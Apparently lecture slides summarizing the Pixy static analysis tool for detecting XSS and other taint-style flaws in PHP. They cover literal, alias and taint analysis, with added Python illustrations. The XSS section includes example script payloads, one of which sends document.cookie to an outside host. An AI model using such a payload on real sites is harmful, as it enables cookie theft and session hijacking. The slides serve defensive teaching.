Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities
Nenad Jovanovic, Christopher Kruegel, Engin Kirda
Secure Systems Lab, Vienna University of Technology
Proceedings of the IEEE Symposium on Security and Privacy (May 2006)
2008/10/2 2
Outline
  Introduction
  Taint-Style Vulnerabilities
  Data Flow Analysis
  Empirical Results
  Conclusions
  Comments
Introduction (1/2)
There is an urgent need for automated vulnerability detection in Web application development.
Existing approaches for mitigating threats to Web applications can be divided into client-side and server-side solutions.
Server-side solutions:
  Static approaches: scan the source code for vulnerabilities
  Dynamic approaches: detect vulnerabilities while executing the audited program
Introduction (2/2)
Pixy
  The first open source tool for statically detecting XSS vulnerabilities in PHP 4 code by means of data flow analysis
  It can be applied to other taint-style vulnerabilities such as SQL injection or command injection
  http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Taint-Style Vulnerabilities (1/2)
Of all vulnerabilities in Web applications, problems caused by unchecked input are recognized as being the most common
  Attackers inject malicious data into Web applications
  Attackers manipulate applications using malicious data
The authors refer to this class of vulnerabilities as the tainted object propagation problem
  Referenced from "Finding security errors in Java programs with static analysis," in Proceedings of the 14th Usenix Security Symposium, Aug. 2005
Taint-Style Vulnerabilities (2/2)
Tainted data
  Originates from potentially malicious users
  Causes security problems at vulnerable points in the program (called sensitive sinks)
  May enter the program at specific places, and can spread via assignment and similar constructs
  Can be untainted (sanitized) using a set of operations
Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities.
  They differ only with respect to the concrete values of a few parameters
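The idea that vulnerability types differ only in a few parameters can be sketched as a small data structure. This is an illustrative Python sketch, not Pixy's internal representation: the class `TaintPolicy` and the helper `is_violation` are hypothetical names. The XSS values are the PHP names the slides list for XSS; the SQL injection values (`mysql_query`, `mysql_real_escape_string`) are an assumption added for contrast and do not come from the slides.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TaintPolicy:
    """Parameters that distinguish one taint-style vulnerability type from another."""
    name: str
    entry_points: frozenset  # where tainted data enters the program
    sanitizers: frozenset    # operations that untaint data
    sinks: frozenset         # sensitive sinks


# XSS parameters, using the PHP names given in the slides.
XSS = TaintPolicy(
    name="XSS",
    entry_points=frozenset({"$_GET", "$_POST", "$_COOKIE"}),
    sanitizers=frozenset({"htmlentities", "htmlspecialchars"}),
    sinks=frozenset({"echo", "print", "printf"}),
)

# SQL injection parameters: an assumption for illustration, not from the slides.
SQLI = TaintPolicy(
    name="SQL injection",
    entry_points=XSS.entry_points,
    sanitizers=frozenset({"mysql_real_escape_string"}),
    sinks=frozenset({"mysql_query"}),
)


def is_violation(policy, source, applied, sink):
    """True if data from `source` reaches `sink` with none of the policy's sanitizers applied."""
    return (
        source in policy.entry_points
        and sink in policy.sinks
        and not (set(applied) & policy.sanitizers)
    )
```

The same check works for both policies; only the three sets change, which is the point the slide makes.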
Cross-Site Scripting (XSS) (1/2)
Occurs when dynamically generated Web pages display improperly validated input
An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites in order to:
  hijack the user's account credentials
  change user settings
  steal cookies
  insert unwanted content into the page
Cross-Site Scripting (XSS) (2/2)
Reflected Cross-Site Scripting Attacks
Stored Cross-Site Scripting Attacks
  An attacker's malicious script is rendered more than once
<script>alert('Hello World');</script>
<a href="/usercp.php?action=logout">A web page about rabbits</a>
<script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>
Properties of XSS
Entry points into the program
  GET: $_GET
  POST: $_POST
  COOKIE: $_COOKIE
  The set of entry points grows when "register_globals" is active
Sanitization routines
  htmlentities(), htmlspecialchars(), and type casts
Sensitive sinks
  echo(), print(), printf(), …
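To make the role of a sanitization routine concrete, the following Python sketch escapes an XSS payload before it would be written to a page. Python's standard `html.escape` is used here only as a rough analogue of PHP's `htmlspecialchars()`; the wrapper name `sanitize_for_html` is hypothetical, and the exact set of characters escaped differs between the two languages.

```python
import html


def sanitize_for_html(value: str) -> str:
    """Escape HTML metacharacters so the browser shows the text instead of running it."""
    return html.escape(value, quote=True)


payload = "<script>alert('Hello World');</script>"
safe = sanitize_for_html(payload)

# The escaped string contains no literal angle brackets, so it cannot open a tag.
print(safe)
```

Once the angle brackets are replaced by entities, the payload can no longer open a script element, which is why an analysis may treat the result of such a routine as untainted.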
Data Flow Analysis (1/4)
Goal: determine whether tainted data can reach sensitive sinks without being properly sanitized
  Identify the taint value of the variables used in these sinks
Statically compute certain information for every single program point (or for coarser units such as functions)
PHP front-end
  Constructs a parse tree for the PHP input file
  The parse tree is transformed into a linearized form resembling three-address code (TAC), and kept as a control flow graph for each encountered function
  TAC is an assembly-like language with at most 3 operands per statement: "x = y op z"
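The linearization step can be sketched as follows. This is a minimal Python illustration of turning a nested expression into three-address statements, assuming a toy tuple-based expression tree; the function names and the `$t1`, `$t2` temporaries are hypothetical and do not reflect Pixy's actual front-end.

```python
from itertools import count


def to_tac(expr, code, fresh):
    """Linearize a nested expression into three-address statements.

    `expr` is either a variable name (str) or a tuple (op, left, right).
    Returns the name of the variable that holds the value of `expr`.
    """
    if isinstance(expr, str):
        return expr
    op, left, right = expr
    lhs = to_tac(left, code, fresh)
    rhs = to_tac(right, code, fresh)
    tmp = f"$t{next(fresh)}"          # fresh temporary for the intermediate result
    code.append(f"{tmp} = {lhs} {op} {rhs}")
    return tmp


def linearize(target, expr):
    """Return the TAC statements for the assignment `target = expr`."""
    code = []
    result = to_tac(expr, code, count(1))
    code.append(f"{target} = {result}")
    return code


# PHP-like input: $x = $a . ($b . $c)
tac = linearize("$x", (".", "$a", (".", "$b", "$c")))
for statement in tac:
    print(statement)
```

Every emitted statement has at most three operands, so later analyses only need transfer functions for a handful of simple statement shapes.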
Data Flow Analysis (2/4)
Operates on the control flow graph (CFG) of a program
  A data structure built on top of the intermediate code representation, abstracting the control flow behavior of a function that is being compiled
  Node: an atomic statement of the program
  Edge: flow of control
Literal Analysis: Basics
Purpose: determine, for each program point, the literal that a variable or a constant can hold.
Can improve the precision of the overall analysis by:
  Evaluating branch conditions
  Ignoring program paths that cannot be executed at runtime (called path pruning)
  Resolving non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses)
After performing literal analysis, each CFG node is associated with information about which literal is mapped to a variable before executing that node
How Data Flow Analysis is Used to Perform Literal Analysis
Assume a fictitious programming language with:
  One variable (v)
  Two literals (the integers 3 and 4)
  A "skip" node: an empty instruction
  "Ω": the unknown literal
Data Flow Analysis (3/4)
Carrier lattice
  Information about the program is represented using values from an algebraic structure
  Every piece of information that could ever be associated with a CFG node by the analysis must be contained as an element of the lattice used
  Bottom element: "not visited yet" at the beginning
  Line between elements: ordering between elements with regard to precision
  Least upper bound: the smallest element that is greater than or equal to both of the elements; needed by the analysis algorithm
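A least upper bound for the small literal lattice of the fictitious language can be sketched in a few lines. This Python sketch assumes a flat lattice in which the bottom element lies below every literal and Ω lies above every literal; the names `BOTTOM`, `OMEGA`, `lub` and `leq` are hypothetical.

```python
BOTTOM = "⊥"  # "not visited yet"
OMEGA = "Ω"   # unknown literal, the least precise element


def lub(a, b):
    """Least upper bound in a flat lattice: BOTTOM < every literal < OMEGA."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    if a == b:
        return a
    return OMEGA  # two different literals (or anything joined with OMEGA)


def leq(a, b):
    """a is at least as precise as b if joining a into b changes nothing."""
    return lub(a, b) == b
```

Joining two different literals loses the information about which one holds, so the result is Ω. That is the situation at a point where two branches assigning 3 and 4 meet.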
Data Flow Analysis (4/4)
Transfer function f: P → P for each node in the control flow graph
  Input: a lattice element
  Output: a lattice element
Models the effect of the node on the program information
Each CFG node is associated with such a transfer function
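Putting lattice and transfer functions together, a literal analysis for the fictitious one-variable language can be sketched with a standard worklist iteration. This Python sketch is a generic textbook formulation, not Pixy's implementation; the CFG encoding, the names `assign`, `skip` and `analyze`, and the choice of Ω as the value at the entry node are assumptions.

```python
BOTTOM, OMEGA = "⊥", "Ω"


def lub(a, b):
    """Least upper bound in the flat literal lattice."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    return a if a == b else OMEGA


def assign(literal):
    """Transfer function of a node `v = literal`: ignores the incoming value."""
    return lambda _incoming: literal


def skip(incoming):
    """Transfer function of a skip node: passes the information through."""
    return incoming


def analyze(nodes, edges, entry):
    """Compute, for every node, the lattice element valid before that node.

    nodes: {node_id: transfer function}, edges: list of (source, destination).
    """
    successors = {n: [] for n in nodes}
    for src, dst in edges:
        successors[src].append(dst)
    before = {n: BOTTOM for n in nodes}   # every node starts as "not visited yet"
    before[entry] = OMEGA                 # assumption: v is unknown on entry
    worklist = [entry]
    while worklist:
        node = worklist.pop()
        out = nodes[node](before[node])
        for succ in successors[node]:
            joined = lub(before[succ], out)
            if joined != before[succ]:    # information changed: revisit successor
                before[succ] = joined
                worklist.append(succ)
    return before


# v = 3; if (...) { v = 4 }; skip
nodes = {0: assign(3), 1: skip, 2: assign(4), 3: skip}
edges = [(0, 1), (1, 2), (1, 3), (2, 3)]
result = analyze(nodes, edges, entry=0)
```

Before the branch (nodes 1 and 2) the analysis knows that v holds 3; at the join (node 3) the two incoming values 3 and 4 are combined to Ω. The loop terminates because each node's value can only move upward in a lattice of finite height.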
Literal Analysis: Basics
Carrier lattice definition
  Provides mappings for all variables and constants that appear in the scanned program
  Able to describe the mapping to any possible literal (infinitely many)
Literal Analysis: Basics
Transfer function definition
  PHP has no explicit type declarations
  "Hidden" arrays
Four cases in order of increasing complexity
1. Not an array element and not known as an array
   strong update
2. An array, but not an array element
   Array tree
3. An array element without non-literal indices (may be an array)
   strong overlap
Four cases in order of increasing complexity
4. An array element with non-literal indices (may be an array)
   weak overlap algorithm: all overwrite operations are replaced by least upper bound operations
   Array elements with one or more non-literal indices are permanently mapped to Ω
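The difference between overwriting and joining can be sketched as two update functions. This Python sketch is a deliberate simplification: it stores array elements as flat dictionary keys rather than in the array trees the slides mention, and the names `strong_update` and `weak_update` are hypothetical.

```python
OMEGA = "Ω"


def lub(a, b):
    """Least upper bound of two literals (bottom element omitted for brevity)."""
    return a if a == b else OMEGA


def strong_update(state, target, literal):
    """The assignment definitely writes `target`: overwrite the old literal."""
    new_state = dict(state)
    new_state[target] = literal
    return new_state


def weak_update(state, candidates, literal):
    """The assignment may write any of `candidates`: join instead of overwrite."""
    new_state = dict(state)
    for candidate in candidates:
        # An element not seen before is treated as unknown.
        new_state[candidate] = lub(new_state.get(candidate, OMEGA), literal)
    return new_state


state = {"$a[0]": "x", "$a[1]": "y"}

# $a[0] = 'z'   (literal index: the target is known exactly)
after_strong = strong_update(state, "$a[0]", "z")

# $a[$i] = 'x'  (non-literal index: any element of $a may be the target)
after_weak = weak_update(state, ["$a[0]", "$a[1]"], "x")
```

After the weak update, `$a[0]` still maps to "x" because old and new literal agree, while `$a[1]` becomes Ω because it may hold either "y" or "x".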
Alias Analysis
Ignoring alias relationships would prevent literal analysis from producing correct results in a number of cases.
Without alias analysis, literal analysis cannot determine that an assignment to $a also affects $b
  The literal recorded for $b would remain unchanged and therefore be incorrect
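The effect can be reproduced with a toy abstract interpreter. This Python sketch assumes a hypothetical statement encoding (`("assign", var, literal)` and `("ref", var, target)`) and straight-line code only; it models the PHP sequence `$a = 1; $b = &$a; $a = 2;`, after which `$b` holds 2 at runtime.

```python
def run(statements, use_aliases):
    """Abstractly execute straight-line code and return the literal of each variable."""
    literals = {}
    group = {}  # variable -> set of variables sharing its memory location
    for statement in statements:
        if statement[0] == "ref":
            _, var, target = statement
            # var leaves its old alias group and joins the group of target.
            group.get(var, {var}).discard(var)
            shared = group.setdefault(target, {target})
            shared.add(var)
            group[var] = shared
            literals[var] = literals.get(target)
        else:
            _, var, literal = statement
            # With alias information, the write reaches every alias of var.
            targets = group.get(var, {var}) if use_aliases else {var}
            for name in targets:
                literals[name] = literal
    return literals


program = [
    ("assign", "$a", 1),
    ("ref", "$b", "$a"),   # $b = &$a
    ("assign", "$a", 2),
]

without_aliases = run(program, use_aliases=False)
with_aliases = run(program, use_aliases=True)
```

Without alias information the analysis still records 1 for `$b`, which is wrong; with it, the second assignment is propagated to `$b` as well.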
Carrier lattice definition
  Alias group: a group of variables referencing the same memory location
  Alias information is modeled through sets of alias group sets
    (…): an alias group
    {…}: an alias group set
  Must-aliases of a variable
    "{(a,b) (c)}": $b is a must-alias of $a
  May-aliases of a variable
    "{(a,b) (c)} {(a,c) (b)}": $b and $c are may-aliases of $a
  The order among lattice elements is defined as subset inclusion
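Must- and may-aliases can be read off such a lattice element mechanically. The Python sketch below encodes an alias group as a frozenset, an alias group set as a frozenset of groups, and a lattice element as a set of alias group sets. The helper names are hypothetical, and treating may-aliases as "aliased in some but not all alias group sets" is an assumption made to match the two examples on the slide.

```python
def group_set(*groups):
    """Build one alias group set, e.g. group_set(("a", "b"), ("c",)) for {(a,b) (c)}."""
    return frozenset(frozenset(g) for g in groups)


def aliases_in(var, gs):
    """Variables that share var's alias group within one alias group set."""
    for g in gs:
        if var in g:
            return set(g) - {var}
    return set()


def must_aliases(var, element):
    """Variables aliased with var in every alias group set of the element."""
    per_set = [aliases_in(var, gs) for gs in element]
    return set.intersection(*per_set) if per_set else set()


def may_aliases(var, element):
    """Variables aliased with var in some, but not all, alias group sets."""
    per_set = [aliases_in(var, gs) for gs in element]
    return set().union(*per_set) - must_aliases(var, element)


one_path = frozenset({group_set(("a", "b"), ("c",))})
other_path = frozenset({group_set(("a", "c"), ("b",))})

# Subset inclusion as the order means the least upper bound is set union.
merged = one_path | other_path
```

With a single alias group set, `$b` is a must-alias of `$a`. After merging the information from two paths, neither `$b` nor `$c` is guaranteed, so both become may-aliases.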
Static analysis is not able to decide which path the program will take
  Under the assumption that the condition is determined by dynamic factors
    Environment variables, user input
Transfer function definition
Reference assignment
  "$a = & $b"
Unset node
  The variable is placed in its own one-element alias group in each alias group set
Global node
  "global $a;"
  Treated like a reference assignment with the equally named variable from the global scope on the right side
The authors only consider references to simple variables
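The reference assignment and unset cases can be sketched as functions on a single alias group set; applying them to a whole lattice element means applying them to each alias group set it contains. This Python sketch uses hypothetical helper names and assumes that every variable already appears in exactly one alias group.

```python
def group_set(*groups):
    """Build one alias group set from tuples of variable names."""
    return frozenset(frozenset(g) for g in groups)


def unset(var, gs):
    """Model unset($var): var ends up in its own one-element alias group."""
    remaining = {g - {var} for g in gs}
    remaining = {g for g in remaining if g}       # drop groups that became empty
    return frozenset(remaining | {frozenset({var})})


def reference_assign(left, right, gs):
    """Model `$left = & $right`: left leaves its old group and joins right's group."""
    if left == right:
        return gs
    detached = unset(left, gs)
    result = set()
    for g in detached:
        if right in g:
            result.add(g | {left})                # left joins the group of right
        elif g == frozenset({left}):
            continue                              # left's temporary singleton group
        else:
            result.add(g)
    return frozenset(result)


def apply_to_element(transfer, element):
    """Lift a function on alias group sets to a lattice element."""
    return frozenset(transfer(gs) for gs in element)


start = group_set(("a",), ("b",), ("c",))
after_first = reference_assign("a", "b", start)        # $a = & $b
after_second = reference_assign("a", "c", after_first)  # $a = & $c
```

The second assignment first detaches `$a` from `$b`, so the result is {(a,c) (b)} rather than one large group.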
Literal Analysis Revisited
Here we only consider references to simple variables
Functions built into PHP are conservatively modeled as returning Ω, since the increased precision from modeling them is expected to be rather small
  The only built-in function modeled precisely is "define"
Literal Analysis Revisited
The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value
On function return (i.e., at the call return node), the alias information for the local variables of the callee is reset to its default, while the caller's locals are restored
Taint Analysis
Purpose: determine, for each program point, the taint value (instead of the literal) of a variable or constant.
This makes it possible to inspect whether any sensitive sink in the program receives malicious data, and hence to detect vulnerabilities
Taint Analysis
Carrier lattice definition
  Tainted: a variable is tainted if it can hold a malicious, not yet sanitized (checked) value originating from user input
  Variables are not mapped to Ω but to the taint values tainted and untainted
    Mapped to tainted: this variable might be tainted
    Mapped to untainted: this variable is untainted
  Whenever the analysis cannot determine the taint value, it is conservatively assumed to be tainted
Taint Analysis
Transfer function definition
  Casting a tainted variable into an integer untaints this variable (implicitly with unary operators such as + and -, or explicitly with (int))
  Correctly modeling built-in PHP functions can reduce the number of false positives
    Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax
    "htmlentities" and "array" return $_UNTAINTED
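These rules can be sketched as a transfer function over simplified statements. In this Python sketch the statement encoding, the function names and the set `UNTAINTING_FUNCTIONS` (a stand-in for the built-in function specification file) are hypothetical. The two functions in that set and the integer-cast rule come from the slides, while treating every other function call as tainted is a conservative assumption.

```python
TAINTED, UNTAINTED = "tainted", "untainted"

ENTRY_POINTS = {"$_GET", "$_POST", "$_COOKIE"}
UNTAINTING_FUNCTIONS = {"htmlentities", "array"}  # stand-in for the specification file
INT_CASTS = {"(int)", "+", "-"}                   # unary operators yielding a number


def lub(a, b):
    """Least upper bound in the two-element lattice untainted < tainted."""
    return TAINTED if TAINTED in (a, b) else UNTAINTED


def taint_of(operand, state):
    """Taint value of an operand; anything unknown is conservatively tainted."""
    if operand in ENTRY_POINTS:
        return TAINTED
    return state.get(operand, TAINTED)


def transfer(stmt, state):
    """Return the taint state after executing one simplified TAC statement."""
    kind, target, *rest = stmt
    new_state = dict(state)
    if kind == "literal":                 # $target = 'some constant'
        new_state[target] = UNTAINTED
    elif kind == "copy":                  # $target = $source
        new_state[target] = taint_of(rest[0], state)
    elif kind == "unary":                 # $target = op $source
        op, source = rest
        new_state[target] = UNTAINTED if op in INT_CASTS else taint_of(source, state)
    elif kind == "concat":                # $target = $left . $right
        left, right = rest
        new_state[target] = lub(taint_of(left, state), taint_of(right, state))
    elif kind == "call":                  # $target = func(args)
        func, _args = rest
        new_state[target] = UNTAINTED if func in UNTAINTING_FUNCTIONS else TAINTED
    else:
        raise ValueError(f"unknown statement kind: {kind}")
    return new_state


program = [
    ("copy", "$name", "$_GET"),
    ("call", "$safe", "htmlentities", ["$name"]),
    ("unary", "$n", "(int)", "$name"),
    ("literal", "$greeting"),
    ("concat", "$msg", "$greeting", "$name"),
]
state = {}
for stmt in program:
    state = transfer(stmt, state)
```

The more built-in functions the specification models precisely, the fewer results fall into the conservative "tainted" default, which is how precise modeling reduces false positives.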
Taint Analysis
Using the analysis results
  Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward
    The analysis information for each sensitive sink is searched for tainted input variables
    A warning message indicating the corresponding line is issued if such a violation is discovered
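The reporting step can be sketched as a single pass over the sink calls. This Python sketch assumes the analysis results are available as a dictionary from line number to taint state; the function name `find_warnings`, the input encoding and the message format are hypothetical and do not reproduce Pixy's actual output.

```python
TAINTED, UNTAINTED = "tainted", "untainted"
SINKS = {"echo", "print", "printf"}


def find_warnings(calls, taint_before):
    """Report every sensitive sink that may receive a tainted argument.

    calls: list of (line, function, arguments)
    taint_before: {line: {variable: taint value}} as computed by the analysis
    """
    warnings = []
    for line, function, arguments in calls:
        if function not in SINKS:
            continue
        state = taint_before.get(line, {})
        for argument in arguments:
            # Missing information is treated conservatively as tainted.
            if state.get(argument, TAINTED) == TAINTED:
                warnings.append(
                    f"line {line}: possibly tainted {argument} reaches {function}()"
                )
    return warnings


calls = [
    (3, "echo", ["$msg"]),
    (4, "echo", ["$safe"]),
    (5, "strlen", ["$msg"]),
]
taint_before = {
    3: {"$msg": TAINTED},
    4: {"$safe": UNTAINTED},
    5: {"$msg": TAINTED},
}
warnings = find_warnings(calls, taint_before)
```

Only the `echo` of `$msg` on line 3 is reported: line 4 prints a sanitized value and line 5 does not call a sensitive sink.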
Limitations
Pixy does not support object-oriented features of PHP.
  The analysis assumes that malicious data can never arise from such constructs.
Files included with "include" and similar keywords are not scanned automatically
  The authors frequently observed false positives stemming from these missing file inclusions
  These were eliminated through manual inclusion
Conclusions
A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities
Additional literal analysis and alias analysis to improve correctness and precision of taint analysis
Pixy, an open-source Java tool that implements these analysis techniques
Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate
Comments
The first to perform alias analysis for an untyped, reference-based scripting language such as PHP
Beyond the scope of the paper
  Recursive calls that depend on dynamic information
  Infinite call depth for non-terminating programs
The implementation is widely used by the public.
Future work
  Automatic inclusion of "include" files